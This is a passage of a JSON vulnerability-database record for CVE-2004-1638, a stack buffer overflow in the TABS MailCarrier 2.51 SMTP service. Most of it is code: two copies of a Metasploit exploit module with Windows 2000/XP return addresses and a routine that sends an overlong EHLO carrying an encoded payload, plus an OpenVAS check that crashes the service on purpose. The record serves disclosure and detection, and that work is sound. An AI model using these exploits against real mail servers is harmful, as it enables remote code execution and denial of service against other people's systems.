overwritten when sending an overly long EHLO command. \n}, \n'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], \n'Arch' => [ ARCH_X86 ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-1638' ], \n[ 'OSVDB', '11174' ], \n[ 'BID', '11535' ], \n[ 'URL', 'http://milw0rm.com/exploits/598' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 300, \n'BadChars' => \"\\x00\\x0a\\x0d:\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => ['win'], \n'Targets' => \n[ \n# Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en. \n[ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1 \n[ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en \n], \n'DisclosureDate' => 'Oct 26 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(25), \nOpt::LHOST(), # Required for stack offset \n], self.class) \nend \n \ndef check \nconnect \nbanner = sock.get_once(-1,3) \ndisconnect \n \nif (banner =~ /ESMTP TABS Mail Server for Windows NT/) \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nsploit = \"EHLO \" + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars) \nsploit << [target['Ret']].pack('V') + payload.encoded \n \nsock.put(sploit + \"\\r\\n\") \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83004/mailcarrier_smtp_ehlo.rb.txt"}], "openvas": [{"lastseen": "2019-05-29T18:31:59", "bulletinFamily": "scanner", "description": "The target is running at least one instance of MailCarrier in which the\n SMTP service suffers from a buffer overflow vulnerability.", "modified": "2019-02-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231015902", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231015902", "title": "TABS MailCarrier SMTP Buffer Overflow Vulnerability", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mailcarrier_smtp_overflow.nasl 13470 2019-02-05 12:39:51Z cfischer $\n#\n# TABS MailCarrier SMTP Buffer Overflow Vulnerability\n#\n# Authors:\n# George A. Theall, <theall@tifaware.com>.\n#\n# Copyright:\n# Copyright (C) 2004 George A. Theall\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.15902\");\n script_version(\"$Revision: 13470 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-05 13:39:51 +0100 (Tue, 05 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2004-1638\");\n script_bugtraq_id(11535);\n script_xref(name:\"OSVDB\", value:\"11174\");\n script_name(\"TABS MailCarrier SMTP Buffer Overflow Vulnerability\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(\"This script is Copyright (C) 2004 George A. Theall\");\n script_family(\"SMTP problems\");\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25, 465, 587);\n script_mandatory_keys(\"smtp/tabs/mailcarrier/detected\");\n\n script_tag(name:\"impact\", value:\"By sending an overly long EHLO command, a remote attacker can crash the SMTP\n service and execute arbitrary code on the target.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MailCarrier 3.0.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The target is running at least one instance of MailCarrier in which the\n SMTP service suffers from a buffer overflow vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smtp_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_smtp_port( default:25 );\n\nbanner = get_smtp_banner( port:port );\nif( ! banner || \"TABS Mail Server\" >!< banner )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nvtstrings = get_vt_strings();\n\n# It's MailCarrier and the port's open so try to overflow the buffer.\n#\n# nb: this just tries to overflow the buffer and crash the service\n# rather than try to run an exploit, like what muts published\n# as a PoC on 10/23/2004. I've verified that buffer sizes of\n# 1032 (from the TABS LABS update alert) and 4095 (from\n# smtp_overflows.nasl) don't crash the service in 2.5.1 while\n# one of 5100 does so that what I use here.\nc = string( \"EHLO \", crap( 5100, vtstrings[\"uppercase\"] ), \"\\r\\n\" );\n\nsend( socket:soc, data:c );\nrepeat {\n s = recv_line( socket:soc, length:32768 );\n}\nuntil( s !~ '^[0-9]{3}[ -]' );\n\nif( ! s ) {\n close( soc );\n sleep( 2 );\n soc = open_sock_tcp( port );\n if( ! soc ) {\n security_message( port:port );\n exit( 0 );\n } else {\n close( soc );\n }\n}\n\nsmtp_close( socket:soc, check_data:s );\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-08-17T05:50:31", "bulletinFamily": "exploit", "description": "This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.\n", "modified": "2017-11-08T16:00:24", "published": "2007-09-09T22:43:03", "id": "MSF:EXPLOIT/WINDOWS/SMTP/MAILCARRIER_SMTP_EHLO", "href": "", "type": "metasploit", "title": "TABS MailCarrier v2.51 SMTP EHLO Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',\n 'Description'\t=> %q{\n This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.\n },\n 'Author' \t => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-1638' ],\n [ 'OSVDB', '11174' ],\n [ 'BID', '11535' ],\n [ 'EDB', '598' ],\n ],\n 'Platform' => ['win'],\n 'Arch'\t\t => [ ARCH_X86 ],\n 'Privileged'\t\t=> true,\n 'DefaultOptions'\t=>\n {\n 'EXITFUNC' \t=> 'thread',\n },\n 'Payload' =>\n {\n #'Space'\t\t\t=> 300,\n 'BadChars' \t\t=> \"\\x00\\x0a\\x0d:\",\n 'StackAdjustment'\t=> -3500,\n },\n 'Targets' =>\n [\n # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.\n [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63\t} ], # jmp esp expsrv.dll w2ksp0 - xpsp1\n [ 'Windows XP SP2 - EN', \t\t { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en\n ],\n 'DisclosureDate' => 'Oct 26 2004',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(25),\n Opt::LHOST(), # Required for stack offset\n ])\n end\n\n def check\n connect\n banner = sock.get_once || ''\n disconnect\n\n if banner.to_s =~ /ESMTP TABS Mail Server for Windows NT/\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n sploit = \"EHLO \" + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)\n sploit << [target['Ret']].pack('V') + payload.encoded\n\n sock.put(sploit + \"\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb"}]}
